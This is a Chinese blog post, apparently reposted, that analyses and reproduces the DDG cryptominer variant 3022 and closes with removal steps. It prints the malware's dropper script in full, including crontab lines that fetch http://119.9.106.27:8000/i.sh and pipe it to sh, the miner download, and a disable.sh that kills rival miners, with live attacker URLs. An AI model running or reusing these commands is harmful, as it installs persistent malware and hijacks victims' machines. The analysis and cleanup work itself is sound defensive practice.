DDG全家桶之3022
本篇文章主要根据360Netlab新出的DDG分析文档来复现新变种3022,会涉及部分分析和清除的方法,
本篇文章只用于学习交流,为广大受害者提供清除思路 ,请勿用于非法用途,产生一切后果与作者无关
详情请参考文档:https://blog.netlab.360.com/fast-analyze-ddg-v3021-and-v3022/
一、下载
下载脚本:http://119.9.106.27:8000/i.sh(i.sh名称位ddgs一贯的作风)
样本地址:119.9.106.27:8000/static/3022/
首先下载i.sh脚本分析下里边的内容
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinecho "*/15 * * * * (curl -fsSL http://119.9.106.27:8000/i.sh||wget -q -O- http://119.9.106.27:8000/i.sh) | sh" | crontab -echo "" > /var/spool/cron/rootecho "*/15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/rootmkdir -p /var/spool/cron/crontabs echo "" > /var/spool/cron/crontabs/rootecho "*/15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/crontabs/rootcd /tmp touch /usr/local/bin/writeable && cd /usr/local/bin/ touch /usr/libexec/writeable && cd /usr/libexec/ touch /usr/bin/writeable && cd /usr/bin/ rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeableexport PATH=$PATH:$(pwd) ps auxf | grep -v grep | grep lrnbbce || rm -rf lrnbbce if [ ! -f "lrnbbce" ]; thenwget -q http://119.9.106.27:8000/static/3022/ddgs.$(uname -m) -O lrnbbce fi chmod +x lrnbbce $(pwd)/lrnbbce || /usr/bin/lrnbbce || /usr/libexec/lrnbbce || /usr/local/bin/lrnbbce || lrnbbce || ./lrnbbce || /tmp/lrnbbceps auxf | grep -v grep | grep lrnbbcb | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep lrnbbcc | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep lrnbbcd | awk '{print $2}' | xargs kill -9`
ddg木马的老套路了,写环境变量、添加到定时任务、下载矿机执行、删除禁用其他挖矿木马(挖矿行业竞争很激烈了)
从3014版本开始增加了云端配置下发 disable.sh 来集中干掉竞争对手,
脚本地址:http://119.9.106.27:8000/static/disable.sh,内容如下
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinmkdir -p /opt/yilu/work/{xig,xige} /usr/bin/bsd-port touch /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64 chmod -w /opt/yilu/work/xig /opt/yilu/work/xige /usr/bin/bsd-port chmod -x /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64 chattr +i /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64rm -rf /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux touch /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux chmod -rw /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux chattr +i /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinuxif [ -e "/tmp/gates.lod" ]; thenrm -rf $(readlink /proc/$(cat /tmp/gates.lod)/exe)kill -9 $(cat /tmp/gates.lod)rm -rf $(readlink /proc/$(cat /tmp/moni.lod)/exe)kill -9 $(cat /tmp/moni.lod)rm -rf /tmp/{gates,moni}.lod fips auxf | grep -v grep | grep /tmp/thisxxs | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep /opt/yilu/work/xig/xig | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep /opt/yilu/mservice | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9
把同类的挖矿进程放到了这个脚本中,来杀掉yilu、以及BillGate家族的gates进程等
不过这都是之前版本的,现在这个更高级了,直接下发二进制程序disable
这个disable的作用可以参考下360的那篇文章:图片来自360netlab博客
目前为了阻止其它挖矿程序ddg3022主要做了以下措施
1.修改Hosts文件,阻止其它挖矿程序的下发
2.杀掉其它挖矿程序
3.使用二进制文件disable
二、运行复现
接下来执行脚本开始我们的复现过程 ,crontab已经写入
CPU已经满载,挖矿程序已经在运行
看下/tmp目录下的样本文件
三、清除
老套路,挖矿木马干什么咱们反着来就是了
删除/var/spool/cron/crontab/root,/var/spool/cron/root文件中 echo "*/15 * * * * curl -fsSL http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/root
删除/tmp/6Tx3Wq,/tmp/disable,/usr/bin/lrnbbce
kill掉进程:6Tx3Wq,lrnbbce
此时挖矿程序已经清理,后续可以删除被增加的hosts等文件
参考文章:
https://blog.netlab.360.com/https-blog-netlab-360-com-a-fast-ddg-3014-analyze/
https://blog.netlab.360.com/fast-analyze-ddg-v3021-and-v3022/
转载于:https://www.cnblogs.com/Id3al/p/10706324.html
DDG全家桶之3022相关推荐
- 阿里技术文档:Redis+Spring全家桶+Dubbo精选+高性能+高并发
最近花了很长的时间去搜罗整理Java核心技术好文,我把每个Java核心技术的优选文章都整理成了一个又一个的文档.今天就把这些东西分享给老铁们,也能为老铁们省去不少麻烦,想学什么技能了,遇到哪方面的问题 ...
- Java全能手册火了!Redis/Nginx/Dubbo/Spring全家桶/啥都有
前言 本文是为了帮大家快速回顾了Java中知识点,这套面试手册涵盖了诸多Java技术栈的面试题和答案,相信可以帮助大家在最短的时间内用作面试复习,能达到事半功倍效果. 本来想将文件上传到github上 ...
- 阿里技术文档:Redis+Nginx+Spring全家桶+Dubbo精选
最近花了很长的时间去搜罗整理Java核心技术好文,我把每个Java核心技术的优选文章都整理成了一个又一个的文档.今天就把这些东西分享给老铁们,也能为老铁们省去不少麻烦,想学什么技能了,遇到哪方面的问题 ...
- TensorFlow全家桶的落地开花 | 2019 Google开发者日
作者 | 唐小引写于上海世博中心 出品 | GDD 合作伙伴 CSDN(ID:CSDNnews) Android 10 原生支持 5G,Flutter 1.9.Dart 2.5 正式发布 这是 Goo ...
- 繁凡的ACM算法全家桶(全新的模板整合计划)
整理的算法模板合集: ACM模板 点我看算法全家桶系列!!! 实际上是一个全新的模板整合计划 ACM算法全家桶的所有内容的 Portable Document Format 版本全部 开 源 啦 !可 ...
- 牛客挑战赛36 D. 排名估算( “概率论全家桶”,好题,拉格朗日插值求自然数 k 次幂之和)
整理的算法模板合集: ACM模板 点我看算法全家桶系列!!! 实际上是一个全新的精炼模板整合计划 Weblink https://ac.nowcoder.com/acm/contest/3782/D ...
- 【学习笔记】《概率与期望全家桶》(ACM / OI)概率与期望 / 概率论知识小结
整理的算法模板合集: ACM模板 点我看算法全家桶系列!!! 实际上是一个全新的精炼模板整合计划 这块知识很少,但是题很难- 目录 0x00 概率 0x01 基本概念 0x02 古典概率 0x03 条 ...
- 【学习笔记】线性代数全家桶(在编程竞赛中的应用)
整理的算法模板合集: ACM模板 点我看算法全家桶系列!!! 实际上是一个全新的精炼模板整合计划 目录 0x00. 矩阵 0x01. 矩阵 0x02. 矩阵的加法与数量乘法 0x03. 矩阵乘法 0x ...
- 二维几何基础大合集!《计算几何全家桶(一)》(基础运算、点、线、多边形、圆、网格)
整理的算法模板合集: ACM模板 点我看算法全家桶系列!!! 实际上是一个全新的模板整合计划 目录 1.基本运算 1.1 判断正负函数(sgn) 1.2 点积(数量积.内积)(Dot) 1.3 向量积 ...
最新文章
- Python __dict__属性详解
- oracle exp语句 按日期命名,Windows平台下Oracle数据库exp全备脚本,根据时间保留备份数及自动上备份至FTP...
- 孔兵 库卡机器人_库卡机器人中华区CEO孔兵:机器人是制造业升级的关键
- Linux Centos6.5如何截图
- 【HDU - 2665】Kth number(区间第K大,主席树,模板)
- Ubuntu 键盘错位解决 更改键盘布局
- CentOS_7 安装MySql5.7
- typescript 博客_如何使用Typescript自动化博客发布过程
- 杭州、互联网、体制化,和中年
- quartus仿真29:JK触发器实现序列信号发生器0010111(分析)
- ASP.NET MVC5+EF6+EasyUI 后台管理系统(59)-BLL层重构
- icmp基于tcp还是udp_imi -- 基于PHP协程应用开发框架,支持WebSocket,TCP,UDP应用开发...
- 九度OJ题目1000: A + B(数学)
- 使用微PE工具箱安装Win7
- HeidiSQL软件推荐( MySQL 服务器和数据库管理的图形化界面)
- maya 白天室内灯光_MAYA室内灯光之灯管的设置技巧
- db2与mysql语法区别_db2和mysql语法的区别是什么
- Android性能优化-Apk瘦身(1)
- 使用电位器控制LED灯的亮度
- canvas如何绘制虚线
热门文章
- Binary String Minimizing CodeForces - 1256D(贪心)
- 2019牛客第八场A All-one Matrices(单调栈)
- php escape undfine,PHP中处理 undefined variable的方法 | Soo Smart!
- android微信小程序支持横屏,微信小程序关于横屏存在的一些问题
- python 免费空间_总算找到php免费空间
- 【图像超分辨率】(SPSR)Structure-Preserving SR with Gradient Guidance
- kafka重复消费问题
- 【精选】uboot/linux/qt/busybox/opengl/yaffs/lzop/glibc源码下载地址
- Windows驱动开发VXD/WDM/WDF/DDK/WDK的联系和区别
- linux系统如何使用fork函数创建子进程